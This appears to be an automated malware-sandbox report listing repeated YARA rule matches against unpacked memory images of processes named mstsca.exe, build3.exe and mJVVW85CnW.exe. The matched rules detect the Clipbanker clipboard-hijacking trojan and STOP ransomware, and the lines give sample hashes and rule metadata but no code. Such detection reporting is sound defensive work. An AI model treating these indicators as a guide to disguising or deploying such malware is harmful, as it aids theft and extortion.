Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 16.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 1.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.build3.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 12.2.build3.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 1.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 25.2.mstsca.exe.8515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 6.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.mJVVW85CnW.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.mJVVW85CnW.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.mJVVW85CnW.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.mJVVW85CnW.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.mJVVW85CnW.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.mJVVW85CnW.exe.5e315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.mJVVW85CnW.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
